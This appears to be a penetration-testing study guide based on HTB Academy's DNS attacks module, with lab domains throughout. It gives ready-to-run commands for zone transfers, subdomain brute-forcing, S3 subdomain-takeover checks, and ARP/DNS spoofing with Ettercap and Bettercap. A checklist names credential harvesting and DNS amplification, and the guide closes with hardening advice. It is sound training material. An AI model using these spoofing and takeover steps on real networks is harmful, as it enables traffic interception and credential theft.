🌐DNS Attacks

🎯 Overview

This document covers exploitation techniques against DNS services, focusing on practical attack methodologies from HTB Academy's "Attacking Common Services" module. DNS attacks can lead to information disclosure, domain takeover, traffic redirection, and man-in-the-middle attacks.

"The Domain Name System (DNS) translates domain names (e.g., hackthebox.com) to the numerical IP addresses (e.g., 104.17.42.72). Since nearly all network applications use DNS, attacks against DNS servers represent one of the most prevalent and significant threats today."

🏗️ DNS Attack Methodology

Attack Chain Overview

Service Discovery → Zone Transfer Exploitation → Subdomain Enumeration → Domain Takeover → DNS Spoofing

Key Attack Objectives

DNS zone transfers for information gathering
Subdomain enumeration to expand attack surface
Domain/subdomain takeover for content control
DNS cache poisoning for traffic redirection
DNS spoofing for man-in-the-middle attacks

📍 Service Discovery & Enumeration

Default DNS Port Detection

# Default DNS ports: UDP/53, TCP/53
# HTB Academy enumeration example
nmap -p53 -Pn -sV -sC 10.10.110.213

# Expected output
PORT    STATE  SERVICE     VERSION
53/tcp  open   domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)

Comprehensive DNS Scanning

# Full DNS service enumeration
nmap -p53 -sU -sV --script dns-* 10.10.110.213

# DNS version detection
nmap -p53 --script dns-nsid 10.10.110.213

# DNS recursion check
nmap -p53 --script dns-recursion 10.10.110.213

Key Information to Extract

DNS server software (BIND, Microsoft DNS, etc.)
Version information for vulnerability research
Zone information (SOA records)
Recursion capabilities
DNS security features (DNSSEC status)

🗄️ DNS Zone Transfer Attacks

Understanding Zone Transfers

DNS Zone Transfer = Copy of DNS database from one server to another
Default behavior: No authentication required
Risk: Complete DNS namespace disclosure
Protocol: Uses TCP/53 for reliable transmission

HTB Academy Zone Transfer Example

Using DIG for AXFR

# HTB Academy zone transfer attack
dig AXFR @ns1.inlanefreight.htb inlanefreight.htb

# Expected successful output
; <<>> DiG 9.11.5-P1-1-Debian <<>> axfr inlanefrieght.htb @10.129.110.213
;; global options: +cmd
inlanefrieght.htb.         604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
inlanefrieght.htb.         604800  IN      AAAA    ::1
inlanefrieght.htb.         604800  IN      NS      localhost.
inlanefrieght.htb.         604800  IN      A       10.129.110.22
admin.inlanefrieght.htb.   604800  IN      A       10.129.110.21
hr.inlanefrieght.htb.      604800  IN      A       10.129.110.25
support.inlanefrieght.htb. 604800  IN      A       10.129.110.28
inlanefrieght.htb.         604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 28 msec
;; SERVER: 10.129.110.213#53(10.129.110.213)
;; WHEN: Mon Oct 11 17:20:13 EDT 2020
;; XFR size: 8 records (messages 1, bytes 289)

Alternative Zone Transfer Methods

# Using nslookup
nslookup
> server ns1.inlanefreight.htb
> set type=any
> ls -d inlanefreight.htb

# Using host command
host -t axfr inlanefreight.htb ns1.inlanefreight.htb

# Using dnsrecon
dnsrecon -d inlanefreight.htb -t axfr

Fierce for Comprehensive DNS Analysis

# HTB Academy Fierce example
fierce --domain zonetransfer.me

# Expected rich output
NS: nsztm2.digi.ninja. nsztm1.digi.ninja.
SOA: nsztm1.digi.ninja. (81.4.108.41)
Zone: success
{<DNS name @>: '@ 7200 IN SOA nsztm1.digi.ninja. robin.digi.ninja. 2019100801 '
               '172800 900 1209600 3600\n'
               '@ 300 IN HINFO "Casio fx-700G" "Windows XP"\n'
               '@ 301 IN TXT '
               '"google-site-verification=tyP28J7JAUHA9fw2sHXMgcCC0I6XBmmoVi04VlMewxA"\n'
               '@ 7200 IN MX 0 ASPMX.L.GOOGLE.COM.\n'
 <DNS name _acme-challenge>: '_acme-challenge 301 IN TXT '
                             '"6Oa05hbUJ9xSsvYy7pApQvwCUSSGgxvrbdizjePEsZI"',
 <DNS name cmdexec>: 'cmdexec 300 IN TXT "; ls"',
 <DNS name contact>: 'contact 2592000 IN TXT "Remember to call or email Pippa '
                     'on +44 123 4567890 or pippa@zonetransfer.me when making '
                     'DNS changes"',
 <DNS name email>: 'email 2222 IN NAPTR 1 1 "P" "E2U+email" "" '
                   'email.zonetransfer.me\n'
                   'email 7200 IN A 74.125.206.26',

🔍 Subdomain Enumeration & Domain Takeover

Subdomain Discovery Techniques

HTB Academy Subfinder Example

# Subdomain enumeration with Subfinder
./subfinder -d inlanefreight.com -v

# Expected output
        _     __ _         _                                           
____  _| |__ / _(_)_ _  __| |___ _ _          
(_-< || | '_ \  _| | ' \/ _  / -_) '_|                 
/__/\_,_|_.__/_| |_|_||_\__,_\___|_| v2.4.5                                                                                                                                                                                                                                                 
                projectdiscovery.io                    

[INF] Enumerating subdomains for inlanefreight.com
[alienvault] www.inlanefreight.com
[dnsdumpster] ns1.inlanefreight.com
[dnsdumpster] ns2.inlanefreight.com
[bufferover] support.inlanefreight.com
[INF] Found 4 subdomains for inlanefreight.com in 20 seconds 11 milliseconds

Subbrute for Internal Networks

# HTB Academy Subbrute setup for internal use
git clone https://github.com/TheRook/subbrute.git
cd subbrute
echo "ns1.inlanefreight.com" > ./resolvers.txt

# DNS brute-forcing with custom resolvers
./subbrute inlanefreight.com -s ./names.txt -r ./resolvers.txt

# Output shows discovered subdomains
Warning: Fewer than 16 resolvers per process, consider adding more nameservers to resolvers.txt.
inlanefreight.com
ns2.inlanefreight.com
www.inlanefreight.com
ms1.inlanefreight.com
support.inlanefreight.com

Domain Takeover Attacks

Understanding Subdomain Takeover

CNAME Record: sub.target.com → anotherdomain.com
Risk: If anotherdomain.com expires and is re-registered
Result: Attacker controls sub.target.com content
Common Targets: AWS S3, GitHub Pages, Heroku, Fastly

HTB Academy Takeover Example

# Check for vulnerable CNAME records
host support.inlanefreight.com

# Vulnerable response
support.inlanefreight.com is an alias for inlanefreight.s3.amazonaws.com

# Test for takeover vulnerability
curl https://support.inlanefreight.com

# Error indicating potential takeover
<Error>
<Code>NoSuchBucket</Code>
<Message>The specified bucket 'inlanefreight' does not exist</Message>
</Error>

Subdomain Takeover Detection Tools

# Using SubOver
python3 subover.py -l subdomains.txt

# Using can-i-take-over-xyz repository guidelines
# Check: https://github.com/EdOverflow/can-i-take-over-xyz

# Common vulnerable services:
# - AWS S3 buckets
# - GitHub Pages
# - Heroku apps
# - Azure websites
# - Fastly CDN

🕷️ DNS Spoofing & Cache Poisoning

Understanding DNS Cache Poisoning

Goal: Alter legitimate DNS records with false information
Methods: 
  1. MITM attacks intercepting DNS traffic
  2. DNS server vulnerabilities exploitation
  3. Local network cache poisoning
Result: Traffic redirection to malicious servers

HTB Academy Ettercap DNS Spoofing

Step 1: Configure DNS Spoofing

# Edit Ettercap DNS configuration
cat /etc/ettercap/etter.dns

# Add spoofing entries
inlanefreight.com      A   192.168.225.110
*.inlanefreight.com    A   192.168.225.110

Step 2: Execute MITM Attack

# Launch Ettercap GUI
ettercap -G

# Steps in Ettercap:
# 1. Hosts > Scan for Hosts
# 2. Add target IP (192.168.152.129) to Target1
# 3. Add gateway IP (192.168.152.2) to Target2
# 4. Plugins > Manage Plugins > dns_spoof

Step 3: Verify DNS Spoofing

# From victim machine (192.168.152.129)
C:\>ping inlanefreight.com

Pinging inlanefreight.com [192.168.225.110] with 32 bytes of data:
Reply from 192.168.225.110: bytes=32 time<1ms TTL=64
Reply from 192.168.225.110: bytes=32 time<1ms TTL=64

# Browser test shows fake page hosted on 192.168.225.110

Alternative DNS Spoofing Tools

# Using Bettercap
bettercap -iface eth0

# Bettercap commands
> set dns.spoof.domains inlanefreight.com
> set dns.spoof.address 192.168.225.110
> dns.spoof on
> arp.spoof on

# Using dnsmasq for local spoofing
echo "192.168.225.110 inlanefreight.com" >> /etc/dnsmasq_spoof.conf
dnsmasq --conf-file=/etc/dnsmasq_spoof.conf

🎯 HTB Academy Lab Scenarios

Scenario 1: DNS Zone Transfer Exploitation

Task: Find all DNS records for "inlanefreight.htb" domain and submit flag found as DNS record

HTB Academy Solution Workflow

Step 1: Setup Subbrute Tool

# Clone subbrute repository
git clone https://github.com/TheRook/subbrute.git && cd subbrute/

# Expected output
Cloning into 'subbrute'...
remote: Enumerating objects: 438, done.
remote: Total 438 (delta 0), reused 0 (delta 0), pack-reused 438
Receiving objects: 100% (438/438), 11.85 MiB | 20.67 MiB/s, done.
Resolving deltas: 100% (216/216), done.

Step 2: Configure DNS Resolver

# Add target DNS server IP to resolvers file
echo STMIP > resolvers.txt

# Replace STMIP with actual target IP (e.g., 10.129.137.154)

Step 3: Subdomain Enumeration

# Use subbrute with SecLists wordlist
python3 subbrute.py inlanefreight.htb -s /opt/useful/SecLists/Discovery/DNS/namelist.txt -r resolvers.txt

# Expected output
Warning: Fewer than 16 resolvers per process, consider adding more nameservers to resolvers.txt.
inlanefreight.htb
helpdesk.inlanefreight.htb
hr.inlanefreight.htb
ns.inlanefreight.htb

Step 4: Zone Transfer on Discovered Subdomains

# Perform zone transfer on hr subdomain and search for TXT records
dig axfr hr.inlanefreight.htb @10.129.137.154 | grep "TXT"

# Successful flag extraction
hr.inlanefreight.htb.	604800	IN	TXT	"HTB{...}"

Alternative Methods

# Method 1: Direct zone transfer
dig AXFR @target_dns_server inlanefreight.htb

# Method 2: Using fierce
fierce --domain inlanefreight.htb

# Method 3: Using dnsrecon
dnsrecon -d inlanefreight.htb -t axfr

# Method 4: Check all discovered subdomains
for sub in helpdesk hr ns; do
    echo "=== Checking $sub.inlanefreight.htb ==="
    dig AXFR @target_dns_server $sub.inlanefreight.htb
done

Advanced DNS Reconnaissance

# Enumerate all record types
dig ANY @target_dns_server inlanefreight.htb

# Check for specific record types
dig TXT @target_dns_server inlanefreight.htb
dig MX @target_dns_server inlanefreight.htb
dig NS @target_dns_server inlanefreight.htb
dig PTR @target_dns_server inlanefreight.htb

# Brute force subdomains
gobuster dns -d inlanefreight.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt

# Check for zone transfer on discovered subdomains
for sub in $(cat discovered_subdomains.txt); do
    dig AXFR @target_dns_server $sub.inlanefreight.htb
done

📋 DNS Attack Checklist

Discovery & Enumeration

Port scanning - UDP/53 and TCP/53 detection
Version enumeration - DNS server software identification
Zone transfer testing - AXFR query attempts
Recursion testing - DNS resolver configuration
DNSSEC validation - Security feature assessment

Information Gathering

Subdomain enumeration - Subfinder, Subbrute, Gobuster
DNS record analysis - A, AAAA, CNAME, MX, TXT, NS records
Reverse DNS lookup - PTR record enumeration
DNS cache snooping - Cached record identification
DNS walking - NSEC record exploitation

Exploitation Techniques

Zone transfer exploitation - Complete DNS data extraction
Subdomain takeover - CNAME record vulnerability assessment
DNS cache poisoning - MITM attack implementation
DNS tunneling - Covert channel establishment
DNS amplification - DDoS attack potential

Post-Exploitation

Traffic monitoring - DNS query analysis
Persistent spoofing - Long-term redirection
Credential harvesting - Fake login page hosting
Lateral movement - Internal DNS server targeting

🛡️ Defense & Mitigation

DNS Server Hardening

Disable zone transfers - Restrict AXFR to authorized servers only
Enable DNSSEC - Cryptographic DNS response validation
Implement access controls - IP-based query restrictions
Regular updates - Patch DNS server software
Rate limiting - Prevent DNS amplification attacks

Network Security

DNS filtering - Block malicious domains
Encrypted DNS - DNS over HTTPS (DoH) or DNS over TLS (DoT)
Split DNS - Separate internal and external DNS
DNS monitoring - Unusual query pattern detection
Cache poisoning protection - Source port randomization

Monitoring & Detection

Zone transfer attempts - Log AXFR queries
Unusual DNS queries - Detect reconnaissance patterns
DNS response validation - Monitor for spoofed responses
Subdomain monitoring - Track new subdomain creation
Certificate transparency - Monitor SSL certificate logs

Subdomain Enumeration - Information gathering techniques
Domain Hijacking - Web-based domain attacks
Man-in-the-Middle - Traffic interception
Social Engineering - Phishing with spoofed domains
Network Pivoting - Internal network access

📚 References

HTB Academy - Attacking Common Services Module
RFC 1035 - Domain Names Implementation and Specification
OWASP DNS Security - DNS attack vectors and mitigations
Subfinder Documentation - Subdomain discovery tool
Ettercap Manual - MITM attack framework
can-i-take-over-xyz - Subdomain takeover reference

This document provides comprehensive DNS attack methodologies based on HTB Academy's "Attacking Common Services" module, focusing on practical exploitation techniques for penetration testing and security assessment.

PreviousSQL Database Attacks NextRDP Attacks

Last updated 4 months ago